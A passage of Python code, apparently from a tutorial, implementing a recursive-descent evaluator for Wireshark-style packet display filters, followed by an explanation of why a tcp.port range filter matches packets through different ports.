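            hit = (addr in wanted) == (op == "==") if op in ("==", "!=") else OPS[op](addr, edge)
        else:
            hit = OPS[op](actual, wanted)
        if hit:
            return True
    return False

def present(pkt, name):
    """Bare protocol or field name: true if the packet carries that layer or field."""
    return any(k == name or k.startswith(name + ".") for k in pkt)

class Filter:
    """Recursive descent: || binds loosest, then &&, then !, so 'a && b || c' reads
    as '(a && b) || c'. Operands are always evaluated, so every token is consumed."""
    def __init__(self, text):
        self.tokens = [WORD_OPS.get(t, t) for t in TOKEN_RE.findall(text)]

    def matches(self, pkt):
        self.pos = 0
        return self._or(pkt)

    def _peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None

    def _take(self):
        self.pos += 1
        return self.tokens[self.pos - 1]

    def _or(self, pkt):
        result = self._and(pkt)
        while self._peek() == "||":
            self._take()
            result = self._and(pkt) or result
        return result

    def _and(self, pkt):
        result = self._not(pkt)
        while self._peek() == "&&":
            self._take()
            result = self._not(pkt) and result
        return result

    def _not(self, pkt):
        if self._peek() == "!":
            self._take()
            return not self._not(pkt)
        tok = self._take()
        if tok == "(":
            result = self._or(pkt)
            if self._take() != ")":
                raise ValueError("expected )")
            return result
        if self._peek() in OPS:
            return compare(pkt, tok, self._take(), self._take())
        return present(pkt, tok)

def apply_filter(text, packets=PACKETS):
    return [p["no"] for p in packets if Filter(text).matches(p)]
```

Running `apply_filter("tcp.port >= 1024 && tcp.port <= 2048")` returns packets 1, 3 and 4 even though none of them uses a port in that range: each comparison is satisfied by a different port of the same packet, which is exactly how Wireshark evaluates it. Compare tcp.srcport and tcp.dstport separately when direction matters.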